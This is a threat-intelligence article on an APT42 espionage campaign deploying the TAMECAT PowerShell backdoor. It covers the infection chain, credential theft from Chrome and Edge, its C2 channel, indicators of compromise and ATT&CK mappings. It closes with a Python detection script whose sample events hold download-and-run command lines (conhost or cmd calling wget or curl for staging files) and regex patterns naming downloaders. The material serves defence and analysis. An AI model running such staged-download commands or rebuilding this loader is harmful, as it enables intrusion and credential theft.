High-ranking government and defense officials have been the target of a new, sophisticated espionage campaign known as "SpearSpecter," which has been seen deploying the TAMECAT backdoor. The campaign, attributed to the Iranian state-sponsored group APT42, uses elaborate social engineering to deliver a modular PowerShell-based implant that steals login credentials from Google Chrome and Microsoft Edge.
[Figure: Specifics of TAMECAT's capabilities. (Source: Pulsedive)]
Recent analysis by the Israel National Digital Agency (INDA) reveals that APT42 operators build extensive rapport with victims, often posing as journalists or conference organizers before delivering the malicious payload.
[Figure: Domains that the National Defense Agency of Israel monitors. (Source: Pulsedive)]
After installation, TAMECAT provides persistent access, enabling the operators to take screenshots, run arbitrary commands, and steal browser data through covert channels such as Telegram and Glitch.
Malware Analysis and the Infection Chain
The infection begins with a VBScript file that performs environmental checks to choose the best execution path. Pulsedive observed that the script queries installed antivirus products via WMI; if "Windows" appears in the antivirus list, it uses conhost to launch a PowerShell command. That command uses wget to retrieve the second-stage loader, a file named nconf.txt, from the hosting service tebi.io.
If that antivirus condition is not met, the script instead uses cmd.exe and curl to download the secondary payload. This branching suggests the malware tries to avoid particular security products while blending in with common system administration tools. The core loader (nconf.txt) is a heavily obfuscated PowerShell script containing AES-encrypted blocks.
The sample (SHA256: bd1f0fb0...) defines two main variables, $te12 and $k12ey, along with several helper functions for decryption. The script retrieves the next stage from a Base64-encoded URL embedded in the code; to hinder static analysis, the first three bytes of the string are dropped before decoding.
The retrieved content (df32s.txt) is then transformed with a bitwise NOT operation and converted into a UTF-8 string.
[Figure: Decoded content. (Source: Pulsedive)]
This reveals the Borjol function, which unlocks the final TAMECAT payload using an AES decryptor and a 256-bit key (kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B). TAMECAT is designed for covert data theft, with specific modules targeting browser environments. The malware connects to its command-and-control (C2) server and creates a working directory in %LocalAppData%\Chrome.
In the analyzed sample, the C2 was hosted on the glitch.me platform at hxxps://accurate-sprout-porpoise[.]glitch[.]me. After gathering system data such as the OS version and computer name, the malware generates a unique victim token, which it saves in config.txt. This data is encrypted with the Borpos AES routine and exfiltrated via POST requests.
The script also transmits the initialization vector (IV) for the encrypted traffic in a custom HTTP header named Content-DPR. The implant's main capabilities are:
PowerShell/C# Execution: running arbitrary code, with the $Language parameter selecting the interpreter.
Browser Manipulation: terminating Chrome processes or enabling remote debugging in Edge in order to steal passwords and cookies.
Screen Capture: taking screenshots of the victim's desktop for surveillance.
Indicators of Compromise
Type       Value
URL        hxxps[:]//s3[.]tebi[.]io/icestorage/config/nconf[.]txt
URL        hxxps[:]//s3[.]tebi[.]io/icestorage/df32s[.]txt
C2 Domain  hxxps[:]//accurate-sprout-porpoise[.]glitch[.]me
SHA256     5404e39f2f175a0fc993513ee52be3679a64c69c79e32caa656fbb7645965422 (VBS)
SHA256     bd1f0fb085c486e97d82b6e8acb3977497c59c3ac79f973f96c395e7f0ca97f8 (PS1)
AES Key    kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B

MITRE ATT&CK TTPs
Tactic               Technique                                    ID
Command and Control  Web Protocols                                T1071.001
Command and Control  Encrypted Channel: Symmetric Cryptography    T1573.001
Command and Control  Ingress Tool Transfer                        T1105
Defense Evasion      Deobfuscate/Decode Files or Information      T1140
Defense Evasion      Obfuscated Files or Information              T1027.013
Discovery            Security Software Discovery                  T1518.001
Discovery            System Information Discovery                 T1082
Execution            PowerShell                                   T1059.001
Execution            Windows Management Instrumentation           T1047
Exfiltration         Exfiltration Over C2 Channel                 T1041

To reduce this risk, organizations are advised to restrict PowerShell execution to signed scripts and to monitor for unusual child processes created by wscript.exe or cscript.exe.
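The monitoring advice above can be turned into a simple scoring rule over process-creation telemetry. The following is an added example written for this article, not code from the report or from Pulsedive; it uses constructed Sysmon-style event records, a placeholder STAGING-HOST in place of the real hosting domain, and hypothetical function names (score_event, detect). It flags a script host (wscript.exe/cscript.exe) spawning a shell only when the command line also invokes a downloader (wget/curl) or references a staging file name from the analysis, so that ordinary logon scripts do not fire the rule.

```python
import re

# Sysmon-style process-creation events; the records below are constructed
# sample data for this example, not telemetry from the report.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"conhost.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}
# Downloader tools and staging file names the analysis describes.
DOWNLOADER_RE = re.compile(r"\b(wget|curl|invoke-webrequest|iwr)\b", re.I)
STAGING_RE = re.compile(r"nconf\.txt|df32s\.txt|tebi\.io|glitch\.me", re.I)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    reasons = []
    parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
    cmd = ev["CommandLine"]
    if parent in SCRIPT_HOSTS and child in SHELLS:
        reasons.append(f"{parent} spawned {child}")
    if DOWNLOADER_RE.search(cmd):
        reasons.append("command line invokes a downloader")
    if STAGING_RE.search(cmd):
        reasons.append("command line references a known staging artefact")
    return len(reasons), reasons

def detect(events, threshold=2):
    """Events whose score reaches the threshold, as (ProcessId, reasons).
    A lone script-host-to-shell edge is normal for logon scripts, so it is
    only reported when paired with a downloader or a staging artefact."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev["ProcessId"], reasons))
    return hits

SAMPLE_EVENTS = [  # STAGING-HOST stands in for the real hosting domain
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\System32\wscript.exe", "Image": r"C:\Windows\System32\conhost.exe",
     "CommandLine": "conhost.exe --headless powershell -w hidden wget https://STAGING-HOST/config/nconf.txt -OutFile nconf.txt"},
    {"ProcessId": 4133, "ParentImage": r"C:\Windows\System32\cscript.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c curl -s -o df32s.txt https://STAGING-HOST/df32s.txt"},
    {"ProcessId": 5002, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"ProcessId": 5310, "ParentImage": r"C:\Windows\System32\wscript.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c net use H: \\fileserver\home"},
]
```

Calling detect(SAMPLE_EVENTS) reports only the two download chains (PIDs 4120 and 4133); the logon script in PID 5310 scores 1 and stays below the threshold.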